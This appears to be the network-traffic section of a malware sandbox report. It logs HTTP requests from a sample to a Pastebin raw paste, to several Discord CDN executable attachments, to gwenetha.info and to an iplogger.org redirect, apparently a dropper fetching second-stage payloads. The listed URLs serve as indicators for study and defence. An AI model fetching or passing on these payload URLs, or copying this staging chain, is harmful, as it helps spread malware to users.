Network Analysis

GET /raw/gCyjHCCH HTTP/1.1 Host: pastebin.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 07 Apr 2021 07:29:04 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d57b9f7a7ce498368d7ec166f955ad5ea1617780544; expires=Fri, 07-May-21 07:29:04 GMT; path=/; domain=.pastebin.com; HttpOnly; SameSite=Lax; Secure x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 186 cf-request-id: 094cd52bbf00000aa067030000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Server: cloudflare CF-RAY: 63c18af2cb410aa0-NRT

GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 07 Apr 2021 07:29:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d56c6c0c019e6087c43f6efc62835d5af1617780565; expires=Fri, 07-May-21 07:29:25 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 094cd57c7a000012d23c232000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=9fhp%2B8Q6XujR9zegqsS2u3cptw%2BWH5u8HMWA4KDoZqLB8TOZcYeyABg39vKh%2FU0u%2Fh2%2BiNFkFRJIjmMOjU7K2yeMWwLjCrGqgQEfRCWZhBl1gH0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 63c18b73fd8c12d2-ICN alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

GET /attachments/826198252025675816/826538114838298715/install_setupVPSfree.exe HTTP/1.1 Host: cdn.discordapp.com

HTTP/1.1 403 Forbidden Date: Wed, 07 Apr 2021 07:29:25 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: keep-alive Set-Cookie: __cfduid=d56c6c0c019e6087c43f6efc62835d5af1617780565; expires=Fri, 07-May-21 07:29:25 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63c18b74cf9412d2-ICN Age: 181 Cache-Control: private, max-age=0 Expires: Wed, 07 Apr 2021 07:26:24 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 094cd57d00000012d263903000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ABg5-UzC1KBhY3X93ZfgnDjAnmuJUUPhz5lTweFLJDnx62i8fBT7t150dgoc8Am33Mgz22RUdaEMPPHHUNrIU0UA68-7Mx7egA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=gchdgqXqrJWK9Xt3zii0eM%2BnwSLnYll7FNGjOn3L%2FBM3BpnDPsfi%2F7a%2FPQVOkGj1FtU6cPciQSL%2Bx0z3z3oOQjleE0WCCu4Z%2BIN5RL1wan8SPws%3D"}],"group":"cf-nel","max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare

GET /attachments/826416818390040589/826855866228670474/7525b875715555.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive

HTTP/1.1 403 Forbidden Date: Wed, 07 Apr 2021 07:29:25 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: keep-alive Set-Cookie: __cfduid=dc1eae5575332249e94b56aa3d43b59ab1617780565; expires=Fri, 07-May-21 07:29:25 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63c18b764999015c-ICN Age: 186 Cache-Control: private, max-age=0 Expires: Wed, 07 Apr 2021 07:26:19 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 094cd57de90000015ca4251000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ABg5-UykRmi-WcIPmndR-30cgsUwYoAaQTf8_c69eRGW0hmeP_rZVYE5HeASLfpkDP0ON1RIjo2sXn-IJ3IzxuqVFm5xzvxxOQ X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=oqo76HV4uegcNIEESgNV3HBkXwqgqmsTd1knz4MGF1uLsKPHRYSk2jsliK8cic2u52PPqGm2WXFApT6jI1zogX5b3VhDtcAjktNJL1nYKSM3zmg%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /setup-KGQJ-1.exe HTTP/1.1 Host: gwenetha.info Connection: Keep-Alive

HTTP/1.1 404 Not Found Date: Wed, 07 Apr 2021 07:29:29 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 19 Connection: keep-alive Set-Cookie: __cfduid=d953faefc72fa291325c1173a4d3c7d851617780568; expires=Fri, 07-May-21 07:29:28 GMT; path=/; domain=.gwenetha.info; HttpOnly; SameSite=Lax X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC cf-request-id: 094cd58ab3000042f42eaa2000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=zVvThRsGDP67l4hbw48kKdoqubUn1BWHt1AzKS3g%2B2pMr6ga0XKsUPKFG46G%2FYryf%2B4cs%2ByxorBVAGdvLYDqqDIwrvC86y5d0%2BrMFwoR"}],"group":"cf-nel","max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 63c18b8ab93b42f4-LAX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

GET /2LehR6.exe HTTP/1.1 Host: iplogger.org Connection: Keep-Alive

HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 07 Apr 2021 07:29:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=r3l2sf7vur9m5egnd9nko22na7; path=/; HttpOnly Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Pragma: no-cache Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261267619; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Location: https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe Strict-Transport-Security: max-age=31536000; preload X-Frame-Options: DENY

GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1 Host: cdn.discordapp.com

HTTP/1.1 200 OK Date: Wed, 07 Apr 2021 07:29:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d857c2c951baa829a94f9efcee41657761617780591; expires=Fri, 07-May-21 07:29:51 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 094cd5e19c0000352c0b93b000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=frP4p3Plt637OvL6wEcoWyqPFx4SQ48fDr8Rg4MjKK6NtIVTjXlsH1oyn013PM2RA0SNudNGH2XUFlts5ME%2FNBKE%2B6ZuOXE7ZHruni2%2FGXOSq5c%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 63c18c15c81d352c-ICN alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

GET /attachments/826416818390040589/826469949593485312/file.exe HTTP/1.1 Host: cdn.discordapp.com

HTTP/1.1 403 Forbidden Date: Wed, 07 Apr 2021 07:29:59 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: keep-alive Set-Cookie: __cfduid=d8b2dbfb58efa3f64a880afc1b071558b1617780599; expires=Fri, 07-May-21 07:29:59 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63c18c4bd952352c-ICN Age: 198 Cache-Control: private, max-age=0 Expires: Wed, 07 Apr 2021 07:26:41 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 094cd603670000352cf63dd000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ABg5-Uyuy8pMG7n-CGKxICK6tgp4j-SbMWRPCEYaHio3B0qeSrj2eTR4Ksr3gQERkx14ybX9I-q3QbGYJgO5pJwX5QlK5uWdnw X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=tn7J8m5JWo7M%2BxJ%2BVEzt%2BVn2Tz%2FMPbqnpKTIQTgJJ%2FyzbZ2M39XmumeMpwyliMvOtVtX3jV0Lzcu6CL3vNTYdpHZL%2F7A2O5Ivgxh4duhv6fqSUk%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe HTTP/1.1 Host: cdn.discordapp.com

HTTP/1.1 403 Forbidden Date: Wed, 07 Apr 2021 07:30:03 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: keep-alive Set-Cookie: __cfduid=d8cd3efafbc3c2e8aaf2fe067898c14911617780602; expires=Fri, 07-May-21 07:30:02 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63c18c60afef0a3c-KIX Cache-Control: private, max-age=0 Expires: Wed, 07 Apr 2021 07:30:03 GMT Vary: Accept-Encoding CF-Cache-Status: EXPIRED Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 094cd6106a00000a3cf292e000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ABg5-Uylca6nICAn3ovtUook9jVr0eBfrVr4RYgZ1d4zNcD-wP8GTj1UpuW_qeGfyGMDkdjXM8WgV9XJYa5ru7ka-DwwhZEX1A X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=BMLa3zPnFAakv1%2BfNEHdo%2By8%2F9lPMCq%2FFMznZRWQwTvrrNq7Pw9JMWHQHerD8S6zLixywomVdZAvZu6aR0JSB47VHLYFOZ%2B03KFxhF%2F7PVKgj7E%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare